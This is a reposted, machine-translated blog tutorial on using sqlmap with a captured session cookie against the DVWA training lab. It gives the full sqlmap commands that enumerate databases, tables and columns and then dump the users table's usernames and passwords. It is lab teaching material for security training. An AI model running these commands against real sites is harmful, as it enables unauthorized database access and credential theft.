当前位置:网站首页>Sqlmap advanced use – cookies

Sqlmap advanced use – cookies

2022-06-25 07:14:00 Python's path to becoming a God

Experimental principle

Cookie, Refers to the data stored on the user's local terminal by some websites in order to identify the user's identity .Cookie stay Web It is very important in application , The unique identification of the user session id There is also cookie Medium . utilize SQLMAP When detecting the target website , Default is without cookie Of , In some cases, outgoing requests may be rejected by the server . At this time , We need to bring cookie To carry out SQL Injection detection .

1. visit DVWA Website

1) visit dvwa, And login .admin password

2) After logging in , Click... On the left menu “DVWA Security”, take DVWA The security level of the website is set to “Low”, And click the Submt

3) Click... On the left menu “SQL Injection” modular , Get into SQL Inject training modules

2. utilize Burpsuite Tool grab bag

1) start-up Burpsuite And set the proxy service port

/img/44/b45c1e22f419454012bda00fd1474c.jpg

2) Set up Firefox agent

​ 

  Be careful : The ports should be consistent

3) Turn on Burpsuite Proxy interception function
/img/ee/38c6e5ced2840420c48042f7742091.jpg

 4) utilize Burpsuite Tool interception HTTP Request package

Get into DVWA Website SQL Inject training modules , Input 1, Click on Submit, here Burpsuite Will intercept HTTP Request package

  Will be one of the cookie Copy the values , As the next step is SQLMAP Of --cookie parameter assignment

3. start-up SQLMAP

Get into sqlmap Catalog , Enter in the search box cmd, And return

/img/b4/23f18fd8864f704447bea66e07fdd3.jpg

 4. Look for the injection point

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" 

  detection result

 5. Get the database name

1) Get the library names of all databases

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs

 

 2) Get the library name of the current database

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db

 

6. obtain dvwa All table names in the database

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables 

 

among , There is one named users Table of , This may store the basic information of website users .

7. obtain users All field names of the table

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns 

 

8. obtain users In the table user and password All values of the field

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump 

 

原网站

版权声明
本文为[Python's path to becoming a God]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202201234081919.html

边栏推荐

猜你喜欢

随机推荐